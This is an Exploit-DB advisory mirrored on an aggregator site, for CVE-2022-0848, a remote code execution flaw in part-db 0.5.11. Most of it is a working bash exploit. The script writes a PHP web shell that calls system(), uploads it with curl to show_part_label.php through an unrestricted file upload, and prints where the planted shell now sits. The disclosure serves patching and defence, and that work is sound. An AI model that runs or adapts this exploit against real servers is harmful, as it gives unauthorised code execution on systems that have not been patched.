[webapps] part-db 0.5.11 - Remote Code Execution (RCE)
2022-3-7 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:64 收藏
2022-3-7 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:64 收藏
# Exploit Title: part-db 0.5.11 - Remote Code Execution (RCE)
# Google Dork: NA
# Date: 03/04/2022
# Exploit Author: Sunny Mehra @DSKMehra
# Vendor Homepage: https://github.com/part-db/part-db
# Software Link: https://github.com/part-db/part-db
# Version: [ 0.5.11.]
# Tested on: [KALI OS]
# CVE : CVE-2022-0848
#
---------------
#!/bin/bash
host=127.0.0.1/Part-DB-0.5.10 #WEBHOST
#Usage: Change host
#Command: bash exploit.sh
#EXPLOIT BY @DSKMehra
echo "<?php system(id); ?>">POC.phtml #PHP Shell Code
result=`curl -i -s -X POST -F "[email protected]" "http://$host/show_part_label.php" | grep -o -P '(?<=value="data/media/labels/).*(?=" > <p)'`
rm POC.phtml
echo Shell Location : "$host/data/media/labels/$result"
文章来源: https://www.exploit-db.com/exploits/50800
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh